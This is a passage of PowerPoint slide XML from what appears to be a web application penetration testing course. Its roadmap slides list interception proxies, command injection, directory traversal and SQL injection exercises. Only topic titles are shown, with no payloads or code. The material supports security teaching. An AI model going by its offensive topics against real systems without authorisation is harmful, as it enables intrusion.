            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35417820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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection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Interception Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1676400"/>
            <a:ext cx="5562600" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interception is one of our main goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we get between the application and the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
